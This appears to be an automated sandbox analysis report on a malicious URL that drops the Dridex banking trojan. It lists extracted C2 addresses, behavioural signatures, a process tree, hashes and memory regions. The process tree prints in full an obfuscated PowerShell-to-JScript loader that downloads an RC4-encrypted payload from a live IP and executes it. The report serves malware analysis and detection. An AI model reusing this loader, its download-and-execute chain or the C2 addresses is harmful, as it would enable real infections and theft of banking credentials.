Analysis
-
max time kernel
62s -
max time network
140s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-02-2021 01:46
Static task
static1
URLScan task
urlscan1
Sample
http://traffic.allindelivery.net/
General
Malware Config
Extracted
dridex
10111
188.165.17.91:8443
185.216.27.185:8172
182.254.209.230:6516
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 720 created 3552 720 WerFault.exe IEXPLORE.EXE -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\hlzo3.exe cryptone C:\Users\Admin\AppData\Local\Temp\hlzo3.exe cryptone -
Processes:
resource yara_rule behavioral1/memory/1456-31-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/1456-33-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 29 3508 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
hlzo3.exepid process 1456 hlzo3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
hlzo3.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hlzo3.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 720 3552 WerFault.exe IEXPLORE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30868686" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{84267F5D-70C1-11EB-BEBD-42CC13A58998} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1489330061" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30868686" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1489330061" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
WerFault.exePowerShell.exepid process 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 720 WerFault.exe 1408 PowerShell.exe 1408 PowerShell.exe 1408 PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
WerFault.exePowerShell.exedescription pid process Token: SeRestorePrivilege 720 WerFault.exe Token: SeBackupPrivilege 720 WerFault.exe Token: SeDebugPrivilege 720 WerFault.exe Token: SeDebugPrivilege 1408 PowerShell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1144 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1144 iexplore.exe 1144 iexplore.exe 3552 IEXPLORE.EXE 3552 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
iexplore.exeIEXPLORE.EXEPowerShell.execmd.exewscript.execmd.exedescription pid process target process PID 1144 wrote to memory of 3552 1144 iexplore.exe IEXPLORE.EXE PID 1144 wrote to memory of 3552 1144 iexplore.exe IEXPLORE.EXE PID 1144 wrote to memory of 3552 1144 iexplore.exe IEXPLORE.EXE PID 3552 wrote to memory of 1408 3552 IEXPLORE.EXE PowerShell.exe PID 3552 wrote to memory of 1408 3552 IEXPLORE.EXE PowerShell.exe PID 3552 wrote to memory of 1408 3552 IEXPLORE.EXE PowerShell.exe PID 1408 wrote to memory of 376 1408 PowerShell.exe cmd.exe PID 1408 wrote to memory of 376 1408 PowerShell.exe cmd.exe PID 1408 wrote to memory of 376 1408 PowerShell.exe cmd.exe PID 376 wrote to memory of 3508 376 cmd.exe wscript.exe PID 376 wrote to memory of 3508 376 cmd.exe wscript.exe PID 376 wrote to memory of 3508 376 cmd.exe wscript.exe PID 3508 wrote to memory of 3020 3508 wscript.exe cmd.exe PID 3508 wrote to memory of 3020 3508 wscript.exe cmd.exe PID 3508 wrote to memory of 3020 3508 wscript.exe cmd.exe PID 3020 wrote to memory of 1456 3020 cmd.exe hlzo3.exe PID 3020 wrote to memory of 1456 3020 cmd.exe hlzo3.exe PID 3020 wrote to memory of 1456 3020 cmd.exe hlzo3.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://traffic.allindelivery.net/1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1144 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1&IPLa&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w&LaPhnNpVRMTUyNg== 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c hlzo3.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\hlzo3.exehlzo3.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 28203⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\hlzo3.exeMD5
86954f76b5c0fbb1cb6ea492711869e2
SHA1081e3460fc0c6e6e6cd1b17b4a8f6b949a88db02
SHA256ffd6ae5e716b2cade6d3365fb9440a5a67f37d3c249d78bdea9e5ef3d39ce52c
SHA5124b77cff3caf6966c50bcde7185173ae5c536058e1cd29d05bf439b6021572d856e40af547f22270c7c91bd13aaf3f76941eab9bc298a52724e965067d9825e69
-
C:\Users\Admin\AppData\Local\Temp\hlzo3.exeMD5
86954f76b5c0fbb1cb6ea492711869e2
SHA1081e3460fc0c6e6e6cd1b17b4a8f6b949a88db02
SHA256ffd6ae5e716b2cade6d3365fb9440a5a67f37d3c249d78bdea9e5ef3d39ce52c
SHA5124b77cff3caf6966c50bcde7185173ae5c536058e1cd29d05bf439b6021572d856e40af547f22270c7c91bd13aaf3f76941eab9bc298a52724e965067d9825e69
-
memory/376-23-0x0000000000000000-mapping.dmp
-
memory/720-4-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/720-5-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/1408-17-0x0000000007E70000-0x0000000007E71000-memory.dmpFilesize
4KB
-
memory/1408-22-0x0000000009210000-0x0000000009211000-memory.dmpFilesize
4KB
-
memory/1408-11-0x00000000074D0000-0x00000000074D1000-memory.dmpFilesize
4KB
-
memory/1408-12-0x0000000006C90000-0x0000000006C91000-memory.dmpFilesize
4KB
-
memory/1408-13-0x00000000075A0000-0x00000000075A1000-memory.dmpFilesize
4KB
-
memory/1408-14-0x00000000046C0000-0x00000000046C1000-memory.dmpFilesize
4KB
-
memory/1408-15-0x00000000046C2000-0x00000000046C3000-memory.dmpFilesize
4KB
-
memory/1408-16-0x0000000007480000-0x0000000007481000-memory.dmpFilesize
4KB
-
memory/1408-3-0x0000000000000000-mapping.dmp
-
memory/1408-18-0x0000000007CB0000-0x0000000007CB1000-memory.dmpFilesize
4KB
-
memory/1408-19-0x0000000008C70000-0x0000000008C71000-memory.dmpFilesize
4KB
-
memory/1408-20-0x0000000008970000-0x0000000008971000-memory.dmpFilesize
4KB
-
memory/1408-21-0x0000000008BD0000-0x0000000008BD1000-memory.dmpFilesize
4KB
-
memory/1408-10-0x0000000006BD0000-0x0000000006BD1000-memory.dmpFilesize
4KB
-
memory/1408-9-0x0000000006D30000-0x0000000006D31000-memory.dmpFilesize
4KB
-
memory/1408-7-0x000000006E7D0000-0x000000006EEBE000-memory.dmpFilesize
6.9MB
-
memory/1408-8-0x00000000045E0000-0x00000000045E1000-memory.dmpFilesize
4KB
-
memory/1408-26-0x00000000046C3000-0x00000000046C4000-memory.dmpFilesize
4KB
-
memory/1456-28-0x0000000000000000-mapping.dmp
-
memory/1456-31-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-32-0x0000000002270000-0x00000000022AC000-memory.dmpFilesize
240KB
-
memory/1456-33-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/3020-27-0x0000000000000000-mapping.dmp
-
memory/3508-24-0x0000000000000000-mapping.dmp
-
memory/3552-2-0x0000000000000000-mapping.dmp